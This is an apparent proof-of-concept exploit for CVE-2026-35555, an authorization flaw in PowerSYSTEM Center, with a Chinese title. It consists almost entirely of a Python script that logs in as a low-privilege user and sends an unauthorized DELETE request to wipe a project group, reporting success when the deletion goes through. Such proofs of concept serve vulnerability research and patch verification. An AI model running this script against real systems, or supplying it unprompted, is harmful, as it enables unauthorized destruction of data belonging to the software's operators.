CVE-2026-35555 PowerSYSTEM Center越权删除漏洞

import requests # Target configuration target_host = "https://<target_ip>" project_group_id = "12345" # ID of the target project group login_url = f"{target_host}/api/login" delete_url = f"{target_host}/api/project-groups/{project_group_id}" # Low privilege user credentials credentials = { "username": "low_priv_user", "password": "user_password" } session = requests.Session() try: # Step 1: Authenticate as low privilege user print("[*] Attempting to login...") auth_resp = session.post(login_url, data=credentials) if auth_resp.status_code == 200: print("[+] Login successful.") # Step 2: Send unauthorized deletion request # The vulnerability allows this user to delete the group without admin rights print(f"[*] Sending deletion request for project group {project_group_id}...") delete_resp = session.delete(delete_url) if delete_resp.status_code == 200 or delete_resp.status_code == 204: print(f"[+] Exploit successful! Project group {project_group_id} has been deleted.") else: print(f"[-] Deletion failed. Status Code: {delete_resp.status_code}") print(delete_resp.text) else: print("[-] Login failed. Check credentials.") except Exception as e: print(f"[!] An error occurred: {e}")